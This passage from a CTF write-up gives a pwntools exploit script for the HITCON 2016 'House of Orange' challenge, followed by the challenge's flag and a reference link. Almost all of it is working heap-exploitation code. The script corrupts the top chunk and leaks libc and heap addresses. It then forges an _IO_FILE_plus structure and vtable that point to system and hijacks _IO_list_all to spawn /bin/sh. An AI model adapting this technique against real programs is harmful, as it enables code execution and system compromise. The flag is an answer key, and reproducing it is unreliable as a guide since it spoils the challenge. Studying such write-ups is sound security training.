    p.recvuntil('Name:')
    p.sendline(name)
    p.recvuntil('Price of Orange:')
    p.sendline(str(200))
    p.recvuntil('Color of Orange:')
    p.sendline(str(2))

Build(128, 'HEAP')

#Change top size
payload = 'A' * 144
payload += p32(0xDEAD) + p32(0x20) + p64(0)
payload += p64(0) + p64(0xf31)
Upgrade(177, payload)

Build(4096, "HEAP")

#Leak Libc Address
Build(1024, "LEAKADD")
leakLibcAddr = u64(See())
libcAddrBase = leakLibcAddr - 0x3c5188
log.info('Leak Libc Addr : ' + hex(leakLibcAddr))
log.info('Leak Liba Addr Base : ' + hex(libcAddrBase))

#Leak Heap Address
Upgrade(1024, 'B'*15)
leakHeapAddr = u64(See())
leakHeapAddr -= 0x130
log.info('Leak Heap Addr : ' + hex(leakHeapAddr))

#Payload Info
io_list_all = libcAddrBase + libc.symbols['_IO_list_all']
system = libcAddrBase + libc.symbols['system']
vtable = leakHeapAddr + 0x658

log.info('io_list_all : ' + hex(io_list_all))
log.info('system : ' + hex(system))
log.info('vtable : ' + hex(vtable))

payload = "C" * 1056

#Write to "Fake struct _IO_FILE_plus", " Fake struct _IO_wide_data"
stream = "/bin/sh\x00" + p64(0x61)
stream += p64(0xddaa) + p64(io_list_all-0x10)
stream = stream.ljust(0xa0, "\x00")
stream += p64(leakHeapAddr+0x700-0xd0)
stream = stream.ljust(0xc0, "\x00")
stream += p64(1)

payload += stream
payload += p64(0)*2
payload += p64(vtable)
payload += p64(1)
payload += p64(2)

```

```
payload += p64(3)
payload += p64(0)*3
payload += p64(system)

Upgrade(2048,payload)

p.recvuntil(":")
p.sendline("1")

p.interactive()
```

Flag

Flag

hitcon{Y0ur_4r3_the_g0d_of_h34p_4nd_Or4ng3_is_s0_4ngry}

Related Site

- <http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html>



Unknown macro: 'html'